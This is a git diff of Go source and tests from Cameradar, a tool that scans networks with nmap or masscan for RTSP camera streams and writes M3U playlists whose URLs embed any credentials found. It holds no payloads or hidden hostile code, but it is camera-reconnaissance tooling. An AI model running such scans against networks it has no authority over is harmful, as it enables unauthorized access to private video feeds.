var builder strings.Builder
|
||||
builder.WriteString("#EXTM3U\n")
|
||||
for _, stream := range streams {
|
||||
url := formatRTSPURL(stream)
|
||||
if url == "" {
|
||||
continue
|
||||
}
|
||||
builder.WriteString("#EXTINF:-1,")
|
||||
builder.WriteString(formatStreamLabel(stream))
|
||||
builder.WriteString("\n")
|
||||
builder.WriteString(url)
|
||||
builder.WriteString("\n")
|
||||
}
|
||||
return builder.String()
|
||||
}
|
||||
|
||||
func formatStreamLabel(stream cameradar.Stream) string {
|
||||
label := stream.Address.String() + ":" + strconv.FormatUint(uint64(stream.Port), 10)
|
||||
if stream.Device == "" {
|
||||
return label
|
||||
}
|
||||
return label + " (" + stream.Device + ")"
|
||||
}
|
||||
|
||||
func formatRTSPURL(stream cameradar.Stream) string {
|
||||
path := "/" + strings.TrimLeft(strings.TrimSpace(stream.Route()), "/")
|
||||
|
||||
credentials := ""
|
||||
if stream.CredentialsFound && (stream.Username != "" || stream.Password != "") {
|
||||
credentials = stream.Username + ":" + stream.Password + "@"
|
||||
}
|
||||
|
||||
return "rtsp://" + credentials + stream.Address.String() + ":" + strconv.FormatUint(uint64(stream.Port), 10) + path
|
||||
}
|
||||
@@ -0,0 +1,58 @@
|
||||
package scan
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"strings"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
"github.com/Ullaakut/cameradar/v6/internal/scan/masscan"
|
||||
"github.com/Ullaakut/cameradar/v6/internal/scan/nmap"
|
||||
"github.com/Ullaakut/cameradar/v6/internal/scan/skip"
|
||||
)
|
||||
|
||||
// Supported discovery backends.
const (
	ScannerNmap = "nmap"
	ScannerMasscan = "masscan"
)

// Config configures how Cameradar discovers RTSP streams.
type Config struct {
	SkipScan bool // when true, every target:port pair becomes a stream without scanning
	Targets []string // hosts, CIDR blocks, or dash ranges (e.g. "192.0.2.10-11")
	Ports []string // ports or dash port ranges (e.g. "8554-8555")
	ScanSpeed int16 // nmap timing template; ignored by other backends
	Scanner string // backend name; blank defaults to nmap (case-insensitive)
}

// Reporter reports scan progress and debug information.
type Reporter interface {
	Debug(step cameradar.Step, message string)
	Progress(step cameradar.Step, message string)
}
|
||||
|
||||
// New builds a stream scanner based on the provided configuration.
|
||||
func New(config Config, reporter Reporter) (cameradar.StreamScanner, error) {
|
||||
expandedTargets, err := expandTargetsForScan(config.Targets)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
if config.SkipScan {
|
||||
return skip.New(expandedTargets, config.Ports), nil
|
||||
}
|
||||
|
||||
scanner := strings.ToLower(strings.TrimSpace(config.Scanner))
|
||||
if scanner == "" {
|
||||
scanner = ScannerNmap
|
||||
}
|
||||
|
||||
switch scanner {
|
||||
case ScannerNmap:
|
||||
return nmap.New(config.ScanSpeed, expandedTargets, config.Ports, reporter)
|
||||
case ScannerMasscan:
|
||||
return masscan.New(expandedTargets, config.Ports, reporter)
|
||||
default:
|
||||
return nil, fmt.Errorf("unsupported scanner %q", scanner)
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,94 @@
|
||||
package scan_test
|
||||
|
||||
import (
|
||||
"net/netip"
|
||||
"testing"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
"github.com/Ullaakut/cameradar/v6/internal/scan"
|
||||
"github.com/stretchr/testify/assert"
|
||||
"github.com/stretchr/testify/require"
|
||||
)
|
||||
|
||||
// TestNew_UsesSkipScanner verifies that SkipScan expands CIDR blocks and
// dash ranges into the full cartesian product of addresses and ports
// without performing any network scan.
func TestNew_UsesSkipScanner(t *testing.T) {
	config := scan.Config{
		SkipScan: true,
		Targets: []string{
			"192.0.2.0/30",
			"192.0.2.10-11",
		},
		Ports:     []string{"554", "8554-8555"},
		ScanSpeed: 4,
	}

	scanner, err := scan.New(config, nil)
	require.NoError(t, err)

	streams, err := scanner.Scan(t.Context())
	require.NoError(t, err)

	// 192.0.2.0/30 expands to four addresses, the dash range to two.
	addrs := []netip.Addr{
		netip.MustParseAddr("192.0.2.0"),
		netip.MustParseAddr("192.0.2.1"),
		netip.MustParseAddr("192.0.2.2"),
		netip.MustParseAddr("192.0.2.3"),
		netip.MustParseAddr("192.0.2.10"),
		netip.MustParseAddr("192.0.2.11"),
	}
	portsExpected := []uint16{554, 8554, 8555}

	var expected []cameradar.Stream
	for _, addr := range addrs {
		for _, port := range portsExpected {
			expected = append(expected, cameradar.Stream{
				Address: addr,
				Port:    port,
			})
		}
	}

	assert.Equal(t, expected, streams)
}

// TestNew_SkipScanPropagatesErrors verifies that an inverted port range
// surfaces as a Scan error rather than being silently ignored.
func TestNew_SkipScanPropagatesErrors(t *testing.T) {
	config := scan.Config{
		SkipScan: true,
		Targets:  []string{"192.0.2.1"},
		Ports:    []string{"8555-8554"},
	}

	scanner, err := scan.New(config, nil)
	require.NoError(t, err)

	_, err = scanner.Scan(t.Context())
	require.Error(t, err)
	assert.ErrorContains(t, err, "invalid port range")
}

// TestNew_UnsupportedScanner verifies that an unknown backend name is
// rejected at construction time.
func TestNew_UnsupportedScanner(t *testing.T) {
	config := scan.Config{
		Targets: []string{"192.0.2.1"},
		Ports:   []string{"554"},
		Scanner: "unsupported",
	}

	_, err := scan.New(config, nil)
	require.Error(t, err)
	assert.ErrorContains(t, err, "unsupported scanner")
}

// TestNew_SkipScanIgnoresUnsupportedScanner verifies that SkipScan takes
// precedence over backend selection, so a bogus Scanner value is never
// validated.
func TestNew_SkipScanIgnoresUnsupportedScanner(t *testing.T) {
	config := scan.Config{
		SkipScan: true,
		Targets:  []string{"192.0.2.1"},
		Ports:    []string{"554"},
		Scanner:  "unsupported",
	}

	scanner, err := scan.New(config, nil)
	require.NoError(t, err)

	streams, err := scanner.Scan(t.Context())
	require.NoError(t, err)
	assert.Equal(t, []cameradar.Stream{{Address: netip.MustParseAddr("192.0.2.1"), Port: 554}}, streams)
}
|
||||
@@ -0,0 +1,109 @@
|
||||
package masscan
|
||||
|
||||
import (
|
||||
"context"
|
||||
"fmt"
|
||||
"net/netip"
|
||||
"strings"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
masscanlib "github.com/Ullaakut/masscan"
|
||||
)
|
||||
|
||||
// Reporter reports scan progress and debug information.
type Reporter interface {
	Debug(step cameradar.Step, message string)
	Progress(step cameradar.Step, message string)
}

// Runner is something that can run a masscan scan.
type Runner interface {
	Run(ctx context.Context) (*masscanlib.Run, error)
}

// Scanner scans targets and ports for RTSP streams.
type Scanner struct {
	runner Runner // performs the underlying masscan run
	reporter Reporter // receives progress and debug messages
}
|
||||
|
||||
// New returns a Scanner configured with the provided targets and ports.
|
||||
func New(targets, ports []string, reporter Reporter) (*Scanner, error) {
|
||||
runner, err := masscanlib.NewScanner(
|
||||
masscanlib.WithTargets(targets...),
|
||||
masscanlib.WithPorts(ports...),
|
||||
masscanlib.WithOpenOnly(),
|
||||
)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("creating masscan scanner: %w", err)
|
||||
}
|
||||
|
||||
return &Scanner{
|
||||
runner: runner,
|
||||
reporter: reporter,
|
||||
}, nil
|
||||
}
|
||||
|
||||
// Scan discovers RTSP streams on the configured targets and ports.
// It delegates to runScan with the scanner's runner and reporter.
func (s *Scanner) Scan(ctx context.Context) ([]cameradar.Stream, error) {
	return runScan(ctx, s.runner, s.reporter)
}
|
||||
|
||||
// runScan executes the masscan run, forwards masscan warnings as debug
// messages, and converts every open port on every parseable host into a
// cameradar.Stream. Hosts with empty or unparseable addresses and ports
// outside 1-65535 are skipped with a progress message.
//
// NOTE(review): unlike the nmap backend there is no service-name check
// here, so "RTSP streams" in the final message really means "open ports
// on the scanned port list" — confirm this wording is intentional.
func runScan(ctx context.Context, runner Runner, reporter Reporter) ([]cameradar.Stream, error) {
	results, err := runner.Run(ctx)
	if err != nil {
		return nil, fmt.Errorf("scanning network: %w", err)
	}

	// Surface scanner warnings without failing the scan.
	for _, warning := range results.Warnings() {
		reporter.Debug(cameradar.StepScan, "masscan warning: "+warning)
	}

	var streams []cameradar.Stream
	for _, host := range results.Hosts {
		address := strings.TrimSpace(host.Address)
		if address == "" {
			reporter.Progress(cameradar.StepScan, "Skipping host with empty address")
			continue
		}

		addr, err := netip.ParseAddr(address)
		if err != nil {
			reporter.Progress(cameradar.StepScan, fmt.Sprintf("Skipping invalid address %q: %v", host.Address, err))
			continue
		}

		for _, port := range host.Ports {
			if port.Status != "open" {
				continue
			}

			// Guard the uint16 conversion below against out-of-range values.
			if port.Number <= 0 || port.Number > 65535 {
				reporter.Progress(cameradar.StepScan, fmt.Sprintf("Skipping invalid port %d on %s", port.Number, host.Address))
				continue
			}

			streams = append(streams, cameradar.Stream{
				Address: addr,
				Port: uint16(port.Number),
			})
		}
	}

	reporter.Progress(cameradar.StepScan, fmt.Sprintf("Found %d RTSP streams", len(streams)))
	updateSummary(reporter, streams)

	return streams, nil
}
|
||||
|
||||
type summaryUpdater interface {
|
||||
UpdateSummary(streams []cameradar.Stream)
|
||||
}
|
||||
|
||||
func updateSummary(reporter Reporter, streams []cameradar.Stream) {
|
||||
updater, ok := reporter.(summaryUpdater)
|
||||
if !ok {
|
||||
return
|
||||
}
|
||||
updater.UpdateSummary(streams)
|
||||
}
|
||||
@@ -0,0 +1,133 @@
|
||||
package masscan
|
||||
|
||||
import (
|
||||
"context"
|
||||
"errors"
|
||||
"net/netip"
|
||||
"sync"
|
||||
"testing"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
masscanlib "github.com/Ullaakut/masscan"
|
||||
"github.com/stretchr/testify/assert"
|
||||
"github.com/stretchr/testify/require"
|
||||
)
|
||||
|
||||
// TestRunScan covers result filtering (invalid addresses, closed and
// out-of-range ports), multi-host aggregation, and scan failure.
func TestRunScan(t *testing.T) {
	tests := []struct {
		name            string
		result          *masscanlib.Run // canned scan result fed to runScan
		err             error           // canned runner error
		wantStreams     []cameradar.Stream
		wantDebug       []string
		wantProgress    []string
		wantErrContains string
	}{
		{
			name: "filters invalid addresses, closed and invalid ports",
			result: &masscanlib.Run{
				Hosts: []masscanlib.Host{
					{
						Address: "192.0.2.10",
						Ports: []masscanlib.Port{
							{Number: 554, Status: "open"},
							{Number: 8554, Status: "closed"},
							{Number: 0, Status: "open"},
						},
					},
					{Address: "not-an-ip", Ports: []masscanlib.Port{{Number: 8554, Status: "open"}}},
					{Address: "", Ports: []masscanlib.Port{{Number: 8554, Status: "open"}}},
				},
			},
			wantStreams: []cameradar.Stream{
				{Address: netip.MustParseAddr("192.0.2.10"), Port: 554},
			},
			wantProgress: []string{
				"Skipping invalid port 0 on 192.0.2.10",
				"Skipping invalid address \"not-an-ip\": ParseAddr(\"not-an-ip\"): unable to parse IP",
				"Skipping host with empty address",
				"Found 1 RTSP streams",
			},
		},
		{
			name: "collects streams from multiple hosts",
			result: &masscanlib.Run{
				Hosts: []masscanlib.Host{
					{Address: "192.0.2.10", Ports: []masscanlib.Port{{Number: 8554, Status: "open"}}},
					{Address: "198.51.100.9", Ports: []masscanlib.Port{{Number: 554, Status: "open"}}},
				},
			},
			wantStreams: []cameradar.Stream{
				{Address: netip.MustParseAddr("192.0.2.10"), Port: 8554},
				{Address: netip.MustParseAddr("198.51.100.9"), Port: 554},
			},
			wantProgress: []string{"Found 2 RTSP streams"},
		},
		{
			name:            "returns error when scan fails",
			err:             errors.New("scan failed"),
			wantErrContains: "scanning network",
		},
	}

	for _, test := range tests {
		t.Run(test.name, func(t *testing.T) {
			reporter := &recordingReporter{}

			streams, err := runScan(t.Context(), fakeRunner{result: test.result, err: test.err}, reporter)

			if test.wantErrContains != "" {
				// Failure path: no streams and no progress reported.
				require.Error(t, err)
				assert.ErrorContains(t, err, test.wantErrContains)
				assert.Empty(t, streams)
				assert.Empty(t, reporter.progress)
				assert.Equal(t, test.wantDebug, reporter.debug)
				return
			}

			require.NoError(t, err)
			assert.Equal(t, test.wantStreams, streams)
			assert.Equal(t, test.wantDebug, reporter.debug)
			for _, progress := range test.wantProgress {
				assert.Contains(t, reporter.progress, progress)
			}
		})
	}
}

// fakeRunner is a Runner stub returning a canned result or error.
type fakeRunner struct {
	result *masscanlib.Run
	err error
}

func (f fakeRunner) Run(context.Context) (*masscanlib.Run, error) {
	return f.result, f.err
}

// recordingReporter records Debug and Progress messages (mutex-guarded)
// and ignores every other Reporter callback.
type recordingReporter struct {
	mu sync.Mutex
	debug []string
	progress []string
}

func (r *recordingReporter) Start(cameradar.Step, string) {}

func (r *recordingReporter) Done(cameradar.Step, string) {}

func (r *recordingReporter) Progress(_ cameradar.Step, message string) {
	r.mu.Lock()
	defer r.mu.Unlock()
	r.progress = append(r.progress, message)
}

func (r *recordingReporter) Debug(_ cameradar.Step, message string) {
	r.mu.Lock()
	defer r.mu.Unlock()
	r.debug = append(r.debug, message)
}

func (r *recordingReporter) Error(cameradar.Step, error) {}

func (r *recordingReporter) Summary([]cameradar.Stream, error) {}

func (r *recordingReporter) Close() {}
|
||||
@@ -0,0 +1,106 @@
|
||||
package nmap
|
||||
|
||||
import (
|
||||
"context"
|
||||
"fmt"
|
||||
"net/netip"
|
||||
"strings"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
nmaplib "github.com/Ullaakut/nmap/v4"
|
||||
)
|
||||
|
||||
// Reporter reports scan progress and debug information.
type Reporter interface {
	Debug(step cameradar.Step, message string)
	Progress(step cameradar.Step, message string)
}

// Runner is something that can run an nmap scan.
type Runner interface {
	Run(ctx context.Context) (*nmaplib.Run, error)
}

// Scanner scans targets and ports for RTSP streams.
type Scanner struct {
	runner Runner // performs the underlying nmap run
	reporter Reporter // receives progress and debug messages
}
|
||||
|
||||
// New returns a Scanner configured with the provided scan speed, targets,
// and ports. scanSpeed is applied as the nmap timing template, and
// service detection is enabled so RTSP ports can be identified later.
func New(scanSpeed int16, targets, ports []string, reporter Reporter) (*Scanner, error) {
	runner, err := nmaplib.NewScanner(
		nmaplib.WithTargets(targets...),
		nmaplib.WithPorts(ports...),
		nmaplib.WithServiceInfo(),
		nmaplib.WithTimingTemplate(nmaplib.Timing(scanSpeed)),
	)
	if err != nil {
		return nil, fmt.Errorf("creating nmap scanner: %w", err)
	}

	return &Scanner{
		runner: runner,
		reporter: reporter,
	}, nil
}
|
||||
|
||||
// Scan discovers RTSP streams on the configured targets and ports.
// It delegates to runScan with the scanner's runner and reporter.
func (s *Scanner) Scan(ctx context.Context) ([]cameradar.Stream, error) {
	return runScan(ctx, s.runner, s.reporter)
}
|
||||
|
||||
// runScan executes the nmap run, forwards nmap warnings as debug
// messages, and converts every open port whose detected service name
// contains "rtsp" into one cameradar.Stream per host address.
// Unparseable addresses are skipped with a progress message.
func runScan(ctx context.Context, nmap Runner, reporter Reporter) ([]cameradar.Stream, error) {
	results, err := nmap.Run(ctx)
	if err != nil {
		return nil, fmt.Errorf("scanning network: %w", err)
	}

	// Surface scanner warnings without failing the scan.
	for _, warning := range results.Warnings() {
		reporter.Debug(cameradar.StepScan, "nmap warning: "+warning)
	}

	var streams []cameradar.Stream
	for _, host := range results.Hosts {
		for _, port := range host.Ports {
			if port.Status() != "open" {
				continue
			}

			// Keep only ports nmap identified as an RTSP service.
			if !strings.Contains(port.Service.Name, "rtsp") {
				continue
			}

			// A host may carry several addresses; emit one stream per
			// address for this port.
			for _, address := range host.Addresses {
				addr, err := netip.ParseAddr(address.Addr)
				if err != nil {
					reporter.Progress(cameradar.StepScan, fmt.Sprintf("Skipping invalid address %q: %v", address.Addr, err))
					continue
				}

				streams = append(streams, cameradar.Stream{
					Device: port.Service.Product,
					Address: addr,
					Port: port.ID,
				})
			}
		}
	}

	reporter.Progress(cameradar.StepScan, fmt.Sprintf("Found %d RTSP streams", len(streams)))
	updateSummary(reporter, streams)

	return streams, nil
}
|
||||
|
||||
// summaryUpdater is an optional capability of a Reporter: reporters that
// implement it receive the discovered streams for display (detected via a
// type assertion in updateSummary).
type summaryUpdater interface {
	UpdateSummary(streams []cameradar.Stream)
}
|
||||
|
||||
func updateSummary(reporter Reporter, streams []cameradar.Stream) {
|
||||
updater, ok := reporter.(summaryUpdater)
|
||||
if !ok {
|
||||
return
|
||||
}
|
||||
updater.UpdateSummary(streams)
|
||||
}
|
||||
@@ -0,0 +1,187 @@
|
||||
package nmap
|
||||
|
||||
import (
|
||||
"context"
|
||||
"errors"
|
||||
"net/netip"
|
||||
"sync"
|
||||
"testing"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
nmaplib "github.com/Ullaakut/nmap/v4"
|
||||
"github.com/stretchr/testify/assert"
|
||||
"github.com/stretchr/testify/require"
|
||||
)
|
||||
|
||||
// TestScanner_Scan covers filtering (closed / non-rtsp ports, invalid
// addresses), multi-host aggregation, and error propagation from the runner.
func TestScanner_Scan(t *testing.T) {
	// The context value only demonstrates that an arbitrary context is threaded through.
	ctx := context.WithValue(t.Context(), contextKey("trace"), "scan")

	tests := []struct {
		name            string
		result          *nmaplib.Run       // canned nmap output for the fake runner
		err             error              // canned runner error
		wantStreams     []cameradar.Stream // expected streams, in discovery order
		wantDebug       []string
		wantProgress    string // one message that must appear among progress lines
		wantErrContains string // non-empty selects the error path
	}{
		{
			name: "filters non-rtsp and closed ports",
			result: buildRun(nmaplib.Host{
				Addresses: []nmaplib.Address{
					{Addr: "127.0.0.1"},
					{Addr: "not-an-ip"},
				},
				Ports: []nmaplib.Port{
					openPort(8554, "rtsp", "ACME"),
					closedPort(554, "rtsp", "ACME"),
					openPort(80, "http", "ACME"),
				},
			}),
			wantStreams: []cameradar.Stream{
				{
					Device:  "ACME",
					Address: netip.MustParseAddr("127.0.0.1"),
					Port:    8554,
				},
			},
			wantProgress: "Found 1 RTSP streams",
		},
		{
			name: "collects multiple hosts",
			result: buildRun(
				nmaplib.Host{
					Addresses: []nmaplib.Address{{Addr: "192.0.2.10"}, {Addr: "192.0.2.11"}},
					Ports: []nmaplib.Port{
						openPort(8554, "rtsp-alt", "Model A"),
					},
				},
				nmaplib.Host{
					Addresses: []nmaplib.Address{{Addr: "198.51.100.9"}},
					Ports: []nmaplib.Port{
						openPort(554, "rtsp", "Model B"),
					},
				},
			),
			wantStreams: []cameradar.Stream{
				{
					Device:  "Model A",
					Address: netip.MustParseAddr("192.0.2.10"),
					Port:    8554,
				},
				{
					Device:  "Model A",
					Address: netip.MustParseAddr("192.0.2.11"),
					Port:    8554,
				},
				{
					Device:  "Model B",
					Address: netip.MustParseAddr("198.51.100.9"),
					Port:    554,
				},
			},
			wantProgress: "Found 3 RTSP streams",
		},
		{
			name:            "returns error when scan fails",
			err:             errors.New("scan failed"),
			wantErrContains: "scanning network",
		},
	}

	for _, test := range tests {
		t.Run(test.name, func(t *testing.T) {
			reporter := &recordingReporter{}

			scanner, err := New(4, []string{"192.0.2.1"}, []string{"554", "8554"}, reporter)
			require.NoError(t, err)

			// Swap in the fake so no real nmap process is needed.
			scanner.runner = fakeRunner{result: test.result, err: test.err}

			streams, err := scanner.Scan(ctx)

			if test.wantErrContains != "" {
				require.Error(t, err)
				assert.ErrorContains(t, err, test.wantErrContains)
				assert.Empty(t, streams)
				assert.Empty(t, reporter.progress)
				assert.Equal(t, test.wantDebug, reporter.debug)
				return
			}

			require.NoError(t, err)
			assert.Equal(t, test.wantStreams, streams)
			assert.Equal(t, test.wantDebug, reporter.debug)
			assert.Contains(t, reporter.progress, test.wantProgress)
		})
	}
}
|
||||
|
||||
// contextKey is a private key type for context values used in tests.
type contextKey string
|
||||
|
||||
// fakeRunner is a Runner stub that returns a canned result or error.
type fakeRunner struct {
	result *nmaplib.Run
	err    error
}

// Run returns the canned result; the context is ignored.
func (f fakeRunner) Run(context.Context) (*nmaplib.Run, error) {
	return f.result, f.err
}
|
||||
|
||||
// recordingReporter is a Reporter test double that records Debug and
// Progress messages for later inspection; all other events are no-ops.
type recordingReporter struct {
	mu       sync.Mutex // guards debug and progress
	debug    []string
	progress []string
}

func (r *recordingReporter) Start(cameradar.Step, string) {}

func (r *recordingReporter) Done(cameradar.Step, string) {}

// Progress records the message.
func (r *recordingReporter) Progress(_ cameradar.Step, message string) {
	r.mu.Lock()
	defer r.mu.Unlock()
	r.progress = append(r.progress, message)
}

// Debug records the message.
func (r *recordingReporter) Debug(_ cameradar.Step, message string) {
	r.mu.Lock()
	defer r.mu.Unlock()
	r.debug = append(r.debug, message)
}

func (r *recordingReporter) Error(cameradar.Step, error) {}

func (r *recordingReporter) Summary([]cameradar.Stream, error) {}

func (r *recordingReporter) Close() {}
|
||||
|
||||
// buildRun wraps hosts in a minimal nmap Run fixture.
func buildRun(hosts ...nmaplib.Host) *nmaplib.Run {
	return &nmaplib.Run{Hosts: hosts}
}
|
||||
|
||||
func openPort(id uint16, serviceName, product string) nmaplib.Port {
|
||||
return nmaplib.Port{
|
||||
ID: id,
|
||||
State: nmaplib.State{
|
||||
State: string(nmaplib.Open),
|
||||
},
|
||||
Service: nmaplib.Service{
|
||||
Name: serviceName,
|
||||
Product: product,
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
func closedPort(id uint16, serviceName, product string) nmaplib.Port {
|
||||
return nmaplib.Port{
|
||||
ID: id,
|
||||
State: nmaplib.State{
|
||||
State: string(nmaplib.Closed),
|
||||
},
|
||||
Service: nmaplib.Service{
|
||||
Name: serviceName,
|
||||
Product: product,
|
||||
},
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,338 @@
|
||||
package skip
|
||||
|
||||
import (
|
||||
"context"
|
||||
"errors"
|
||||
"fmt"
|
||||
"net"
|
||||
"net/netip"
|
||||
"strconv"
|
||||
"strings"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
)
|
||||
|
||||
// Scanner is a stream scanner that skips discovery and treats every target/port as a stream.
type Scanner struct {
	targets []string // raw target tokens: IPs, CIDRs, IPv4 octet ranges, hostnames
	ports   []string // raw port tokens: numbers, ranges, service names; comma-separated
}
|
||||
|
||||
// New builds a scanner that skips discovery and treats every target/port as a stream.
|
||||
func New(targets, ports []string) *Scanner {
|
||||
return &Scanner{
|
||||
targets: targets,
|
||||
ports: ports,
|
||||
}
|
||||
}
|
||||
|
||||
// Scan returns the precomputed list of streams.
//
// Target and port expansion happens here rather than in New so DNS and
// service lookups use the caller's context.
func (s *Scanner) Scan(ctx context.Context) ([]cameradar.Stream, error) {
	return buildStreamsFromTargets(ctx, s.targets, s.ports)
}
|
||||
|
||||
func buildStreamsFromTargets(ctx context.Context, targets, ports []string) ([]cameradar.Stream, error) {
|
||||
resolvedPorts, err := parsePorts(ctx, ports)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if len(resolvedPorts) == 0 {
|
||||
return nil, errors.New("no valid ports provided")
|
||||
}
|
||||
|
||||
resolvedTargets, err := expandTargets(ctx, targets)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if len(resolvedTargets) == 0 {
|
||||
return nil, errors.New("no valid target addresses resolved")
|
||||
}
|
||||
|
||||
streams := make([]cameradar.Stream, 0, len(resolvedTargets)*len(resolvedPorts))
|
||||
for _, addr := range resolvedTargets {
|
||||
for _, port := range resolvedPorts {
|
||||
streams = append(streams, cameradar.Stream{
|
||||
Address: addr,
|
||||
Port: port,
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
return streams, nil
|
||||
}
|
||||
|
||||
func parsePorts(ctx context.Context, ports []string) ([]uint16, error) {
|
||||
seen := make(map[uint16]struct{})
|
||||
resolved := make([]uint16, 0, len(ports))
|
||||
|
||||
for _, entry := range ports {
|
||||
for raw := range strings.SplitSeq(entry, ",") {
|
||||
value := strings.TrimSpace(raw)
|
||||
if value == "" {
|
||||
continue
|
||||
}
|
||||
|
||||
values, err := parsePortValue(ctx, value)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
for _, port := range values {
|
||||
if _, exists := seen[port]; exists {
|
||||
continue
|
||||
}
|
||||
seen[port] = struct{}{}
|
||||
resolved = append(resolved, port)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return resolved, nil
|
||||
}
|
||||
|
||||
func parsePortValue(ctx context.Context, value string) ([]uint16, error) {
|
||||
if strings.Contains(value, "-") {
|
||||
parts := strings.SplitN(value, "-", 2)
|
||||
if len(parts) != 2 {
|
||||
return nil, fmt.Errorf("invalid port range %q", value)
|
||||
}
|
||||
|
||||
start, err := parsePortNumber(strings.TrimSpace(parts[0]))
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("invalid port range %q: %w", value, err)
|
||||
}
|
||||
end, err := parsePortNumber(strings.TrimSpace(parts[1]))
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("invalid port range %q: %w", value, err)
|
||||
}
|
||||
if start > end {
|
||||
return nil, fmt.Errorf("invalid port range %q", value)
|
||||
}
|
||||
|
||||
ports := make([]uint16, 0, end-start+1)
|
||||
for port := start; port <= end; port++ {
|
||||
ports = append(ports, port)
|
||||
}
|
||||
return ports, nil
|
||||
}
|
||||
|
||||
port, err := parsePortNumber(value)
|
||||
if err == nil {
|
||||
return []uint16{port}, nil
|
||||
}
|
||||
|
||||
servicePort, lookupErr := net.DefaultResolver.LookupPort(ctx, "tcp", value)
|
||||
if lookupErr != nil {
|
||||
return nil, fmt.Errorf("invalid port %q", value)
|
||||
}
|
||||
if servicePort < 1 || servicePort > 65535 {
|
||||
return nil, fmt.Errorf("port %d out of range", servicePort)
|
||||
}
|
||||
return []uint16{uint16(servicePort)}, nil
|
||||
}
|
||||
|
||||
// parsePortNumber parses value as a TCP/UDP port in [1, 65535].
func parsePortNumber(value string) (uint16, error) {
	parsed, err := strconv.Atoi(value)
	switch {
	case err != nil:
		return 0, err
	case parsed < 1, parsed > 65535:
		// Port 0 is reserved and anything above 65535 does not fit uint16.
		return 0, fmt.Errorf("port %d out of range", parsed)
	}
	return uint16(parsed), nil
}
|
||||
|
||||
func expandTargets(ctx context.Context, targets []string) ([]netip.Addr, error) {
|
||||
seen := make(map[netip.Addr]struct{})
|
||||
resolved := make([]netip.Addr, 0, len(targets))
|
||||
|
||||
for _, target := range targets {
|
||||
value := strings.TrimSpace(target)
|
||||
if value == "" {
|
||||
continue
|
||||
}
|
||||
|
||||
addrs, err := parseTargetAddrs(ctx, value)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
for _, addr := range addrs {
|
||||
if !addr.IsValid() {
|
||||
continue
|
||||
}
|
||||
if _, exists := seen[addr]; exists {
|
||||
continue
|
||||
}
|
||||
seen[addr] = struct{}{}
|
||||
resolved = append(resolved, addr)
|
||||
}
|
||||
}
|
||||
|
||||
return resolved, nil
|
||||
}
|
||||
|
||||
func parseTargetAddrs(ctx context.Context, target string) ([]netip.Addr, error) {
|
||||
prefix, err := netip.ParsePrefix(target)
|
||||
if err == nil { // Return early.
|
||||
return expandPrefix(prefix), nil
|
||||
}
|
||||
|
||||
if strings.Contains(target, "-") {
|
||||
addrs, ok, err := parseIPv4Range(target)
|
||||
if ok {
|
||||
return addrs, err
|
||||
}
|
||||
}
|
||||
|
||||
addr, err := netip.ParseAddr(target)
|
||||
if err == nil { // Return early.
|
||||
return []netip.Addr{addr}, nil
|
||||
}
|
||||
|
||||
ips, err := net.DefaultResolver.LookupIPAddr(ctx, target)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("resolving hostname %q: %w", target, err)
|
||||
}
|
||||
|
||||
addrs := make([]netip.Addr, 0, len(ips))
|
||||
for _, ip := range ips {
|
||||
addr, ok := netip.AddrFromSlice(ip.IP)
|
||||
if !ok {
|
||||
continue
|
||||
}
|
||||
addrs = append(addrs, addr.Unmap())
|
||||
}
|
||||
|
||||
if len(addrs) == 0 {
|
||||
return nil, fmt.Errorf("no ip addresses found for hostname %q", target)
|
||||
}
|
||||
|
||||
return addrs, nil
|
||||
}
|
||||
|
||||
func expandPrefix(prefix netip.Prefix) []netip.Addr {
|
||||
if !prefix.IsValid() {
|
||||
return nil
|
||||
}
|
||||
|
||||
prefix = prefix.Masked()
|
||||
addr := prefix.Addr()
|
||||
addrs := make([]netip.Addr, 0, 16)
|
||||
|
||||
for current := addr; prefix.Contains(current); {
|
||||
addrs = append(addrs, current)
|
||||
next := current.Next()
|
||||
if !next.IsValid() {
|
||||
break
|
||||
}
|
||||
current = next
|
||||
}
|
||||
|
||||
return addrs
|
||||
}
|
||||
|
||||
// octetRange is an inclusive range of values for a single IPv4 octet,
// e.g. the "10-20" part of "192.168.10-20.1".
type octetRange struct {
	start int
	end   int
}
|
||||
|
||||
func parseIPv4Range(target string) ([]netip.Addr, bool, error) {
|
||||
parts := strings.Split(target, ".")
|
||||
if len(parts) != 4 {
|
||||
return nil, false, nil
|
||||
}
|
||||
|
||||
ranges := make([]octetRange, 4)
|
||||
for i, part := range parts {
|
||||
parsed, ok, err := parseOctetRange(part)
|
||||
if err != nil {
|
||||
return nil, true, err
|
||||
}
|
||||
|
||||
if !ok {
|
||||
return nil, false, nil
|
||||
}
|
||||
ranges[i] = parsed
|
||||
}
|
||||
|
||||
addrs := make([]netip.Addr, 0, 16)
|
||||
for first := ranges[0].start; first <= ranges[0].end; first++ {
|
||||
for second := ranges[1].start; second <= ranges[1].end; second++ {
|
||||
for third := ranges[2].start; third <= ranges[2].end; third++ {
|
||||
for fourth := ranges[3].start; fourth <= ranges[3].end; fourth++ {
|
||||
addrs = append(addrs, netip.AddrFrom4([4]byte{
|
||||
byte(first),
|
||||
byte(second),
|
||||
byte(third),
|
||||
byte(fourth),
|
||||
}))
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return addrs, true, nil
|
||||
}
|
||||
|
||||
